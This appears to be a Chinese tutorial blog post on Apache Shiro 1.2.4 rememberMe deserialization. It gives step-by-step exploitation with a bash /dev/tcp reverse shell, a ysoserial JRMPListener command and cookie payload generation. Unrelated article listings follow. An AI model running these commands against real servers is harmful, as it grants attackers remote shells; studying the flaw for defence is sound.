网络安全深入学习第五课——热门框架漏洞(RCE— Apache Shiro 1.2.4反序列化漏洞)

news2024/11/25 9:51:58

文章目录

  • 一、序列化和反序列化
  • 二、反序列化漏洞原理
  • 三、Apache Shiro 1.2.4反序列化漏洞
    • 1、漏洞描述:
    • 2、漏洞影响的版本
    • 3、Shiro反序列化漏洞原理
    • 4、工作原理:
    • 5、shiro反序列化的特征:
  • 四、Apache Shiro 1.2.4反序列化漏洞手工复现
    • 1、使用DNSlog严重漏洞是否存在
    • 2、VPS监听端口
    • 3、构造反弹shell命令,并且进行base64编码
    • 4、在VPS开启一个JRMP(端口设置1099)
    • 5、使用s.py构造payload,构造jrmp请求远程恶意序列化数据
    • 6、前台登录,注意`需要勾选Remember Me` ,截获数据包,加入payload,将payload发送服务器
  • 五、使用工具检查

一、序列化和反序列化

  • 什么是序列化?
    序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,保证对象的完整性和可传递性;

  • 什么是反序列化?
    反序列化即逆过程,由字节流还原成对象。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。

简单理解,序列化就是把对象转换为电脑能看懂的格式(字节流),反序列化就是把对象转换为人能看得懂的格式(字符、数字)。

在PHP中序列化和反序列化对应的函数分别为serialize()unserialize()

二、反序列化漏洞原理

------ 当程序在进行反序列化时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。

------ 危害:

  1. 远程代码执行,如:system(‘whoami’)、system(‘cat/etc/passwd’)等
  2. 重放攻击
  3. 注入
  4. 特权提升

三、Apache Shiro 1.2.4反序列化漏洞

1、漏洞描述:

------ Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

2、漏洞影响的版本

------ Apache Shiro <=1.2.4

3、Shiro反序列化漏洞原理

------ AES加密的密钥Key被硬编码在代码里,Shiro是开源软件,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞

------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问

------ 也就是说它使用了CookieRememberMeManager类对用户的登陆凭证进行处理。我们可以把AES加密的密钥爆破出来。

4、工作原理:

在服务端接收cookie值时,按照如下步骤来解析处理:

  1. 检索RememberMe cookie 的值
  2. Base 64解码
  3. 使用AES解密(加密密钥硬编码)
  4. 进行反序列化操作,生成用户登录信息对象(未作过滤处理)
    在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。

5、shiro反序列化的特征:

返回包中存在 rememberMe=deleteMe 字段
在这里插入图片描述

四、Apache Shiro 1.2.4反序列化漏洞手工复现

1、使用DNSlog严重漏洞是否存在

  • 1)dnslog申请一个临时域名:qsg7i9.dnslog.cn
    在这里插入图片描述

  • 2)使用shiro.py 脚本,生成检测payload(dns解析)
    例如:python shiro.py "http:// qsg7i9.dnslog.cn "
    在这里插入图片描述

  • 3)路径下获得了一个payload.cookie
    在这里插入图片描述
    在这里插入图片描述
    生成的文件里面有一个序列化的payload

  • 4)把生产的payload复制下来,然后放到Burp上面进行重放
    在这里插入图片描述

  • 5)返回DNSlog上面去查看
    在这里插入图片描述
    这样就说明存在反序列化漏洞了。

2、VPS监听端口

nc -lvvp [反弹shell所到的端口]
在这里插入图片描述

3、构造反弹shell命令,并且进行base64编码

反弹shell命令:
/bin/bash -i >& /dev/tcp/[反弹shell所到的IP]/ [反弹shell所到的端口] 0>&1

  • 编码前:
    在这里插入图片描述

  • 编码后:
    在这里插入图片描述

4、在VPS开启一个JRMP(端口设置1099)

  • 使用工具:ysoserial-master-SNAPSHOT.jar

java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 “bash -c {echo,[反弹shell命令经过base64编码后的内容]}|{base64,-d}|{bash,-i}”
在这里插入图片描述

5、使用s.py构造payload,构造jrmp请求远程恶意序列化数据

python3 s.py [攻击者IP]:1099
在这里插入图片描述
这个工具相当于代替我们把payload进行了AES解密,然后进行了base64编码。

6、前台登录,注意需要勾选Remember Me ,截获数据包,加入payload,将payload发送服务器

在这里插入图片描述

五、使用工具检查

下面是工具:shiroexpv3.0
在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1020334.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

做好制造项目管理的5个技巧

做好制造项目管理的5个技巧

制造过程通常由不同的要素组成&#xff0c;如采购材料、与供应商合作、优化生产线效率等。制造商还需要处理库存、物流和分销。 为了确保制造项目在预算范围内按时完成&#xff0c;并且不遗漏任何环节&#xff0c;企业必须建立项目管理流程&#xff0c;以帮助改善组织流程和效…
阅读更多...
社区版MyApps低代码平台,免费即刻拥有!

社区版MyApps低代码平台,免费即刻拥有!

编者按&#xff1a;本文主要介绍了MyApps推出的免费社区版的优势&#xff0c;为企业数字化转型提供了解决方案。立即登录MyApps低代码平台&#xff0c;就能获取永久免费的低代码平台。 1.MyApps社区版的优势 1.1不受限制&#xff0c;畅享自由 无用户限制、无安装限制、全面应用…
阅读更多...
使用 Charles 去修改响应信息(真实工作使用场景1)

使用 Charles 去修改响应信息(真实工作使用场景1)

目录 背景 理论 Breakpoint功能 Map功能 实践 原理 背景 测试过程中&#xff0c;遇到接口透传数据&#xff0c;修改请求中的值可以使用Postman来进行&#xff0c;当业务场景遇到修改响应里的值的时候&#xff0c;就需要借助Charles来进行。 以下将会阐述具体的步…
阅读更多...
七天学会C语言-第三天(循环语句)

七天学会C语言-第三天(循环语句)

1. 用 while 语句循环做数学运算&#xff1a; 使用while语句&#xff0c;您可以创建一个循环&#xff0c;它会重复执行一段代码&#xff0c;直到指定的条件不再满足。 例 1&#xff1a; 求 246100。 #include <stdio.h>int main() {int n 1, sum 0, a 2;while (n &…
阅读更多...
第六章 关系数据库理论

第六章 关系数据库理论

第六章 关系数据库理论 6.1 问题的提出 关系模式的表示 关系模式由五部分组成&#xff0c;是一个五元组&#xff1a;R&#xff08;U&#xff0c;D&#xff0c;DOM&#xff0c;F&#xff09;。&#xff08;1 关系名R是符号化的元组语义。U为一组属性。D为属性组U中的属性所来自…
阅读更多...
K8s的网络——Underlay和Overlay网络

K8s的网络——Underlay和Overlay网络

0. 基础知识 1&#xff09;网络7层基础知识 在网络7层协议基础里&#xff0c; 第一层物理链路&#xff1b;第二层是数据链路层&#xff0c;在第一层的基础上引入MAC地址做数据转发。MAC地址在局域网内具有唯一性&#xff0c;主机A发送数据时&#xff0c;会向局域网内进行广播…
阅读更多...
idea显示git分支信息(GitToolBox插件)

idea显示git分支信息(GitToolBox插件)

效果图 说明 本身idea在右下角会有git分支信息&#xff0c;但是显示的当前打开文件的分支信息&#xff0c;并且不够显眼 解决 1、安装插件(GitToolBox插件) 2、修改idea.properties project.tree.structure.show.urlfalse ide.tree.horizontal.default.autoscrollingfalse将…
阅读更多...
【数据结构】堆的应用+TOP-K问题+二叉树遍历

【数据结构】堆的应用+TOP-K问题+二叉树遍历

欢迎来到我的&#xff1a;世界 希望作者的文章对你有所帮助&#xff0c;有不足的地方还请指正&#xff0c;大家一起学习交流 ! 目录 前言堆的时间复杂度向下调整算法的时间复杂度向上调整算法的时间复杂度 堆的应用堆排序TOP—K问题链式二叉树二叉树的节点&#xff1a;初始化节…
阅读更多...
ThreadLocal线程局部变量

ThreadLocal线程局部变量

1.原理 ThreadLocal是用来保存当前线程数据的&#xff0c;每一个线程的内部都有一个ThreadLocalMap&#xff0c;当前这个map中存储了以当前ThreadLocal作键&#xff0c;具体的数据作值的一个个Entry对象。 为什么非得以ThreadLocal对象作键呢&#xff1f;因为一个线程可能使用了…
阅读更多...
手游联运平台是什么?

手游联运平台是什么?

手游联运平台是一种服务于手游联运的专业平台&#xff0c;旨在为游戏开发商、发行商和代理商提供联运合作所需的技术、工具和资源。这些平台通常提供以下功能和服务&#xff1a; 游戏接入和管理&#xff1a;允许游戏开发商将他们的游戏接入联运平台&#xff0c;以便发行到不同的…
阅读更多...
linux 环境变量详解/etc/proflie

linux 环境变量详解/etc/proflie

Linux 环境变量是可以在多个文件中进行配置的&#xff0c;如/etc/proflie&#xff0c;/etc/profile.d/*.sh&#xff0c;~/.bashrc&#xff0c;~/.bash_profile等但是这些之间有什么区别呢 bash的运行模式可以分为 login shell 和 non-login shell。 例如&#xff1a;通过终端&a…
阅读更多...
【送书活动】强势挑战Java,Kotlin杀回TIOBE榜单Top 20!学Kotlin看哪些书?

【送书活动】强势挑战Java,Kotlin杀回TIOBE榜单Top 20!学Kotlin看哪些书?

前言 「作者主页」&#xff1a;雪碧有白泡泡 「个人网站」&#xff1a;雪碧的个人网站 「推荐专栏」&#xff1a; ★java一站式服务 ★ ★ React从入门到精通★ ★前端炫酷代码分享 ★ ★ 从0到英雄&#xff0c;vue成神之路★ ★ uniapp-从构建到提升★ ★ 从0到英雄&#xff…
阅读更多...
王道考研操作系统

王道考研操作系统

王道考研操作系统 计算机系统概述操作系统的概念操作系统的特征操作系统的发展历程操作系统内核中断和异常![在这里插入图片描述](https://img-blog.csdnimg.cn/162452b4c60144e0bd500e180127c447.png)系统调用操作系统结构虚拟机错题 进程与线程进程控制进程通信线程和多线程模…
阅读更多...
Python+Selenium定位不到元素常见原因及解决办法(报:NoSuchElementException)

Python+Selenium定位不到元素常见原因及解决办法(报:NoSuchElementException)

这篇文章主要介绍了PythonSelenium定位不到元素常见原因及解决办法(报&#xff1a;NoSuchElementException),文中通过示例代码介绍的非常详细&#xff0c;对大家的学习或者工作具有一定的参考学习价值&#xff0c;需要的朋友们下面随着小编来一起学习学习吧 在做web应用的自动…
阅读更多...
elasticsearch17-自动补全

elasticsearch17-自动补全

个人名片&#xff1a; 博主&#xff1a;酒徒ᝰ. 个人简介&#xff1a;沉醉在酒中&#xff0c;借着一股酒劲&#xff0c;去拼搏一个未来。 本篇励志&#xff1a;三人行&#xff0c;必有我师焉。 本项目基于B站黑马程序员Java《SpringCloud微服务技术栈》&#xff0c;SpringCloud…
阅读更多...
2023/9/17总结

2023/9/17总结

Vue defineOptions 为什么要使用defineOptions 在有<script setup> 之前 如果需要定义props emit 可以很容易的添加一个与setup 平级的属性 但是用了 <script setup> 后 就不能这样做了 setup 属性也就没有了&#xff0c;就不能添加 与其平级 的属性 为了解…
阅读更多...
基于springboot+vue的网上商城系统

基于springboot+vue的网上商城系统

一、选题背景意义 &#x1f30a;项目背景&#xff1a;该电子商城系统旨在为商家和消费者提供一个直观、易用的购物平台&#xff0c;通过该平台销售商品和宣传品牌&#xff0c;消费者通过该平台购买商品&#xff0c;享受更便捷的购物体验。在该电子商城系统中&#xff0c;商家可…
阅读更多...
腾讯Behaviac Designer 和Unity连调行为树

腾讯Behaviac Designer 和Unity连调行为树

1. 克隆源码 https://github.com/Tencent/behaviac/ 2. 编译生成BehaviacDesigner.exe 3. 找到并打开BehaviacDesigner.exe&#xff08;先不急着填弹出的路径workspace 设置框&#xff09; 4. 新建一个Unity 空工程&#xff0c;并在此处下载behaviac unitypackage 5. Unity中…
阅读更多...
C#引用Microsoft.Office.Interop.Excel

C#引用Microsoft.Office.Interop.Excel

1.添加相关包 在项目的引用上&#xff0c;鼠标右键点击&#xff0c;选择管理“NuGet程序包”&#xff0c;如下图所示。 2.搜索Microsoft.Office.Interop.Excel 打开后&#xff0c;按照下图所示进行操作。 3.查看引用 此时&#xff0c;在引用中&#xff0c;可以看见&#xff0c;…
阅读更多...
K8s(Kubernetes)学习(五)——Service:ClusterIP、NodePort、LoadBalancer、 ExternalName

K8s(Kubernetes)学习(五)——Service:ClusterIP、NodePort、LoadBalancer、 ExternalName

第五章 Service 什么是 Service为什么需要 ServiceService 特性Service 与 Pod 关联Service type 类型如何使用 Service多端口配置 1 什么是 Service 1.1 定义 官网地址: https://kubernetes.io/zh-cn/docs/concepts/services-networking/service/ 将运行在一个或一组 Pod…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023